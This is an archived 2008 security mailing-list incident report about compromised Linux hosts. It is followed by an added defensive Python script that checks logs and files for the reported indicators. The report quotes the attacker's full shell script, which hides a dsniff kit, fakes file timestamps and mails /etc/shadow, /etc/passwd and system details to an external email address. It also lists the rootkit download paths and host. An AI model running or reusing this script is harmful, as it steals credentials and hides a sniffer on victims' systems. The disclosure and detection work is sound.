[nsp-sec] Yahoo email address catching password files - rootkit hosted at AS 21844

Daniel Adinolfi dra1 at postoffice9.mail.cornell.edu
Fri Oct 10 14:09:25 EDT 2008


Folks,

We have a major incident here involving a number of Linux hosts.  The script that gets run by the bad guys sends the /etc/passwd and /etc/shadow files (along with some other tidbits) to a particular yahoo.com email address.  It also installs a trojaned sshd and installs dsniff.

The email address in question is cc.cappy at yahoo.com.  Can someone at Yahoo please take down this address?

The root kit is available here:

webbuild.org

which is currently at 75.125.198.200.

AS      | IP               | AS Name
21844   | 75.125.198.200   | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
PEER_AS | IP               | AS Name
2914    | 75.125.198.200   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 75.125.198.200   | LEVEL3 Level 3 Communications
3561    | 75.125.198.200   | SAVVIS - Savvis
4565    | 75.125.198.200   | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 75.125.198.200   | MFNX MFN - Metromedia Fiber Network
7922    | 75.125.198.200   | DNEO-OSP3 - Comcast Cable Communications, Inc.

The following files are downloaded after the compromise, which we believe is through X-Windows.

WGET /.web/ssh.tgz
WGET /.web/sniff.tgz
WGET /.web/clean

ssh.tgz is an sshd replacement.  sniff.tgz is dsniff.

This is the script that was run to send the password and system info:
________________________

dir=`pwd`
mkdir /var/spool/.mail
mv snif2/* /var/spool/.mail
touch -acmr /usr/sbin/sshd /var/spool/.mail/*
cd /var/spool/.mail
./start

cd $dir
echo "[+]Sending root information"
echo "##########hostname##########" >> mail
hostname -f >> mail
hostname -i >> mail
echo "##########shadow list##########" >> mail
cat /etc/shadow >> mail
echo "##########passwd list##########" >> mail
cat /etc/passwd >>mail
echo "##########ifconfig##########" >> mail
/sbin/ifconfig | grep inet >> mail
echo "##########kernel type##########" >> mail
uname -a >> mail
echo "Os system" >> mail
cat /etc/issue >> mail
echo "sending mail"
mail cc.cappy at yahoo.com -s "$(hostname -f)" < mail
cd ..
rm -rf sniff
rm -rf sniff.tgz

___________________________

If folks would like more info, please feel free to contact me directly.

Thanks.

-Dan


_________________
Daniel Adinolfi, CISSP
Senior Security Engineer, IT Security Office
Cornell University - Office of Information Technologies
email: dra1 at cornell.edu   phone: 607-255-7657
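An added defender-side triage check for the indicators in this report (example code written for this archive page, not part of the original post): it scans Common Log Format web/proxy lines for fetches of the three dropper paths listed above and, on a host, flags the /var/spool/.mail directory together with any file in it whose mtime matches /usr/sbin/sshd, which is what the script's `touch -acmr` produces. The log lines embedded in it are constructed samples, not entries from the incident.

```python
import os
import re

# Indicators from the report: paths the dropper fetches, the hidden directory
# the dsniff files are moved into, and the binary whose timestamps are cloned.
DROPPER_PATHS = ("/.web/ssh.tgz", "/.web/sniff.tgz", "/.web/clean")
HIDDEN_DIR = "/var/spool/.mail"
REFERENCE_BIN = "/usr/sbin/sshd"

# Common Log Format: client ident user [time] "METHOD path PROTO" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not from the report), used by the test run.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2008:13:59:01 -0400] "GET /.web/ssh.tgz HTTP/1.0" 200 81233',
    '10.0.0.5 - - [10/Oct/2008:13:59:02 -0400] "GET /.web/sniff.tgz HTTP/1.0" 200 44100',
    '10.0.0.7 - - [10/Oct/2008:14:01:10 -0400] "GET /index.html HTTP/1.1" 200 512',
]


def dropper_fetches(log_lines):
    """Return (client, path) pairs for requests to the rootkit components."""
    return [(m.group(1), m.group(3)) for m in map(CLF_RE.match, log_lines)
            if m and m.group(3) in DROPPER_PATHS]


def timestamp_clones(candidates, reference):
    """Candidates whose mtime equals the reference's to the nanosecond.
    'touch -acmr REF' copies REF's atime and mtime; only mtime is compared
    here because atime drifts with later reads of REF."""
    ref_mtime = os.stat(reference).st_mtime_ns
    clones = []
    for path in candidates:
        try:
            if os.stat(path).st_mtime_ns == ref_mtime:
                clones.append(path)
        except OSError:  # file vanished or unreadable; skip it
            continue
    return clones


def triage_host(hidden_dir=HIDDEN_DIR, reference=REFERENCE_BIN):
    """Flag the hidden spool directory and timestamp-cloned files inside it."""
    findings = []
    if os.path.isdir(hidden_dir):
        findings.append(f"hidden directory present: {hidden_dir}")
        files = [os.path.join(hidden_dir, f) for f in sorted(os.listdir(hidden_dir))]
        for path in timestamp_clones(files, reference):
            findings.append(f"mtime cloned from {reference}: {path}")
    return findings
```

Run triage_host() as root on a suspect box; the mtime match is a strong signal only in combination with the hidden directory, since files from the same package as sshd legitimately share its mtime.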